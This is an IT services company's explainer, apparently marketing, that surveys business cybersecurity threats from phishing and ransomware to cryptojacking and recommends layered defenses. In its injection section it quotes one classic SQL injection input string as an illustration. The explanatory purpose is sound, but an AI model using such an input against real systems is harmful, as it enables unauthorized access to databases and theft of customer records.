Understanding Major Cybersecurity Threats

Table of Contents

According to the FBI's 2024 Internet Crime Report, cybercrime losses in the US reached $16.6 billion last year — a 33% increase over 2023 — across more than 859,000 complaints. The majority of incidents targeted businesses, and small and mid-sized organizations accounted for a disproportionate share of victims.

A firewall and antivirus are still worth having. They're just not enough — and haven't been for years. Modern attacks don't require bypassing your perimeter; they work through your inbox, your employees, your vendors, and your own credentials. Understanding how these attacks actually work is the first step toward defending against them.

Below are the major threat categories affecting businesses today, with enough detail to understand what you're actually up against.

Social Engineering and Phishing

Phishing remains the most reported cybercrime in the US — 193,407 complaints in 2024 alone. The term covers a broad family of attacks, but the core mechanic is the same: manipulate a person into taking an action they shouldn't. That might mean clicking a link, entering credentials on a fake login page, wiring money, or approving an MFA prompt they didn't initiate.

What's changed is the quality. Phishing emails used to be easy to spot — poor grammar, suspicious domains, obvious urgency. That's less true now. Attackers use AI tools to write convincing copy, clone real vendor invoices, and spoof internal email addresses with enough accuracy to fool people who should know better. Business Email Compromise (BEC) — a targeted form of phishing that impersonates executives or vendors to redirect payments — generated $2.77 billion in losses in 2024 according to the FBI.

Spear phishing is the targeted version: attackers research a specific person or organization before crafting the message. A message that references your actual CFO, your real accounting software vendor, and an invoice number from your legitimate billing cycle is very hard to dismiss on instinct alone. That's the point.

Defenses that actually help: email filtering with anti-spoofing (DMARC, DKIM, SPF), phishing simulation training through platforms like KnowBe4, and MFA on all email accounts — particularly Microsoft 365 and Google Workspace, which are the most impersonated platforms.

Ransomware

Ransomware encrypts your files and demands payment for the decryption key. In practice, most attacks today go further: attackers exfiltrate data before encrypting it, so you're facing both operational shutdown and the threat of public data release — a model called double extortion.

The 2021 Colonial Pipeline attack is the most cited example of ransomware causing physical disruption. The pipeline operator shut down 5,500 miles of fuel pipeline preemptively after the attack, triggering fuel shortages across the southeastern US before the company paid a $4.4 million ransom. The FBI later recovered a portion of the payment.

For most businesses, the scenario is less dramatic but still expensive. Ransomware typically enters through phishing emails, unpatched VPN vulnerabilities, or compromised remote desktop (RDP) credentials. Once inside, attackers move laterally — often sitting in the network for weeks before triggering encryption — to maximize damage and find backup systems to destroy first.

Recovery without backups is either impossible or dependent on paying the ransom, which doesn't guarantee data restoration. According to Sophos's 2024 ransomware report, 70% of ransomware attacks in 2024 involved data encryption, and the average recovery cost reached $2.73 million — not counting ransom payments.

Defenses: immutable offsite backups tested regularly, network segmentation to limit lateral movement, endpoint detection and response (EDR) tools like CrowdStrike or SentinelOne, and a tested incident response plan. For organizations that haven't formalized their recovery procedures, disaster recovery planning covers the RTO, RPO, and failover decisions that determine how fast you can actually get back up.

Malware and Endpoint Threats

Malware is the umbrella term for malicious software — ransomware is a subset, but the category also includes spyware, trojans, keyloggers, and credential stealers. There are over 1.2 billion known malware programs in existence, and new variants are written constantly to evade signature-based detection.

Keyloggers record every keystroke on an infected device, capturing passwords, credit card numbers, and anything else typed — often without any visible symptoms. Spyware operates similarly but may also capture screenshots, browser history, and clipboard contents. These tools are commonly delivered through drive-by downloads (visiting a compromised website), infected email attachments, or pirated software.

Trojans masquerade as legitimate software. A user installs what looks like a PDF reader or utility tool; the trojan quietly establishes a backdoor or installs additional payloads. Once the backdoor exists, attackers can return at will.

Traditional antivirus relies on known threat signatures — it can't catch threats it hasn't seen before. EDR tools use behavioral analysis to detect anomalous activity (a process that shouldn't be accessing the registry, an application making outbound connections at 3am) regardless of whether the specific malware is in any database.

Man-in-the-Middle and Network Interception

Man-in-the-middle (MITM) attacks position an attacker between two communicating parties — typically a user and a web application — allowing them to intercept, read, or modify traffic in transit. Public Wi-Fi is the classic vector: an attacker on the same network can use tools to capture unencrypted traffic or serve a spoofed SSL certificate to intercept HTTPS sessions.

For businesses, the more common risk is internal network interception or ARP poisoning — an attacker who has already gained network access can position themselves to capture credentials or session tokens from other users on the same subnet.

Forcing HTTPS with strict transport security, using certificate pinning for critical applications, and routing remote employees through a VPN or Zero Trust Network Access (ZTNA) solution all reduce MITM exposure.

Denial of Service Attacks

A Denial of Service (DoS) attack floods a target — a web server, a network link, a specific application — with enough traffic or malformed requests to make it unresponsive. Distributed DoS (DDoS) scales this up by using a botnet: thousands or millions of compromised devices generating traffic simultaneously.

For most small businesses, a sustained DDoS means your website goes down, email stops working, or VoIP phones drop calls. For businesses dependent on uptime — e-commerce, financial services, healthcare portals — downtime has direct revenue and compliance implications.

Botnets — the networks of compromised devices used to run DDoS attacks — are also rented on dark web markets, meaning a competitor or disgruntled party can purchase an attack against your infrastructure for a few hundred dollars.

Web Application and Injection Attacks

SQL injection attacks exploit web forms or URLs that pass input directly to a database without sanitizing it. An attacker enters a malicious string — something like ' OR '1'='1 — that manipulates the database query, potentially dumping the entire contents of a database, including usernames, hashed passwords, and customer records.

Cross-site scripting (XSS) attacks inject malicious JavaScript into a web page that executes in other users' browsers. A comment field on a forum, an unsanitized product review form, a support ticket system — any of these can be a delivery vehicle. The injected script might steal session cookies, redirect users to phishing pages, or capture form inputs.

Both attack types are common against any business running a web application — customer portals, booking systems, WordPress sites with third-party plugins. Regular vulnerability scanning and web application firewalls (WAF) are the standard mitigation.

Domain and DNS Attacks

DNS spoofing (also called DNS cache poisoning) corrupts the DNS resolution process so that users trying to reach your legitimate domain are silently redirected to a fake site. The URL in the browser looks correct; the site looks correct; the attacker is capturing every credential entered.

Domain hijacking is more disruptive: attackers gain control of a domain registration (often through a compromised registrar account) and can redirect your entire web presence, intercept email, or hold the domain hostage.

DNS filtering — such as Cisco Umbrella or similar tools — operates at the DNS layer to block known malicious domains before a connection is established, which stops a wide range of attacks that depend on phoning home to attacker infrastructure.

Credential and Password Attacks

Brute force attacks systematically try credential combinations — either pure guessing or, more commonly, credential stuffing: using username/password pairs leaked from previous breaches to try against other services. If an employee uses the same password for their personal accounts as for corporate systems, and that password was exposed in any of the thousands of known data breaches, attackers already have it.

Password spraying is a subtler variant: instead of hammering one account with many passwords (which triggers lockout policies), attackers try one common password against thousands of accounts. This often succeeds and doesn't trigger standard account lockout alerts.

MFA defeats most credential-based attacks — even with the correct username and password, an attacker can't authenticate without the second factor. Microsoft Entra ID (formerly Azure AD) with Conditional Access policies allows you to enforce MFA, restrict logins by geography or device compliance, and detect anomalous sign-in patterns.

Insider Threats

Insider threats come from employees, contractors, or vendors with legitimate access — either acting maliciously or, more often, accidentally. A disgruntled employee exfiltrating customer data before leaving. An IT contractor with admin credentials and no oversight. An employee who clicks a phishing link and doesn't report it because they're embarrassed. All of these are insider threat scenarios.

The challenge is that behavioral controls, not just technical controls, are required here. Role-based access control (RBAC) limits what any given account can reach. Privileged access management (PAM) tools log and control what admins do with elevated credentials. Data loss prevention (DLP) policies in Microsoft Purview or similar tools can flag unusual data transfers.

Zero-Day and Unpatched Vulnerabilities

A zero-day is a vulnerability that the vendor doesn't yet know about — or has known about but hasn't patched. Attackers who discover or purchase zero-days can exploit them with no defense available until a patch ships. High-value zero-days sell for significant sums on criminal markets and are typically reserved for targeted attacks against high-value targets.

More common for most businesses are known, unpatched vulnerabilities — software with available patches that simply haven't been applied. The 2021 Microsoft Exchange Server vulnerabilities (ProxyLogon, ProxyShell) were exploited for months after patches were available because organizations hadn't applied them. Patch management — systematic, timely patching of operating systems, applications, and network devices — is unglamorous but accounts for a substantial portion of actual attack surface.

Cryptojacking

Cryptojacking installs mining software on compromised devices to use their CPU/GPU power for cryptocurrency mining — without the owner's knowledge. The attacker pays nothing for compute; you pay the electricity and hardware wear. It typically goes undetected for a long time because there's no data theft or visible disruption, just degraded performance and unexplained resource consumption.

It's common in cloud environments, where attackers with access to credentials spin up compute resources and run mining workloads until the bill shows up. Monitoring cloud spend and setting alerts on unusual resource provisioning catches this. EDR tools can detect and kill the mining processes on endpoints.

What This Means Practically

No single tool addresses all of these. A layered approach — MFA on all accounts, email filtering, DNS filtering, EDR on all endpoints, patching discipline, and regular backups — eliminates the majority of attack vectors in practice. The question isn't whether to do everything at once; it's which gaps are most likely to be exploited given your environment, industry, and threat profile.

A formal IT assessment gives you a baseline: what you have, what's missing, and what to prioritize. For businesses that have never had one, it's almost always more revealing than expected.

For more on specific attack defenses and tool recommendations, see our Protect Your Business from Cyberattacks guide.

Reach out to Stratify IT to discuss a cybersecurity assessment for your organization — we'll identify where you're exposed and what it actually takes to close those gaps.

Learn more about our cybersecurity services to see the full range of what we offer.

Stratify IT — cybersecurity built around your business, not a template.

For more on protecting your organization, explore our cybersecurity services.